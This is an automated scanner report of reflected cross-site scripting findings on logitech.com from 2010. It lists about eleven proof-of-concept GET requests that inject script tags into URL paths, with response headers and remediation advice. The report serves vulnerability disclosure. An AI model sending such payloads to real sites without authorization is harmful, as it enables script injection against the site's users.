<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68aee</script><script>alert(1)</script>93039219420 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/subnavigation.js68aee</script><script>alert(1)</script>93039219420 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/webcam-communications
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6584f"><script>alert(1)</script>a09fbd296bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript6584f"><script>alert(1)</script>a09fbd296bd/v2/webtrends.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2407</script><script>alert(1)</script>f6d7c5166c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascripte2407</script><script>alert(1)</script>f6d7c5166c7/v2/webtrends.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53eba</script><script>alert(1)</script>d9fbddce9ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v253eba</script><script>alert(1)</script>d9fbddce9ac/webtrends.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc1f"><script>alert(1)</script>6252d02ca7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v21dc1f"><script>alert(1)</script>6252d02ca7d/webtrends.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d735d"><script>alert(1)</script>9cec5a0d04d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/webtrends.jsd735d"><script>alert(1)</script>9cec5a0d04d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f1c1</script><script>alert(1)</script>b904a85523f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/webtrends.js8f1c1</script><script>alert(1)</script>b904a85523f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88b1"><script>alert(1)</script>57dc6f26bd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /robots.txtd88b1"><script>alert(1)</script>57dc6f26bd4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad900</script><script>alert(1)</script>affbd80993f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /robots.txtad900</script><script>alert(1)</script>affbd80993f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a02cb"><script>alert(1)</script>23f3feda15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /thank_youa02cb"><script>alert(1)</script>23f3feda15c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e9b8</script><script>alert(1)</script>3850fd71622 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /thank_you1e9b8</script><script>alert(1)</script>3850fd71622 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>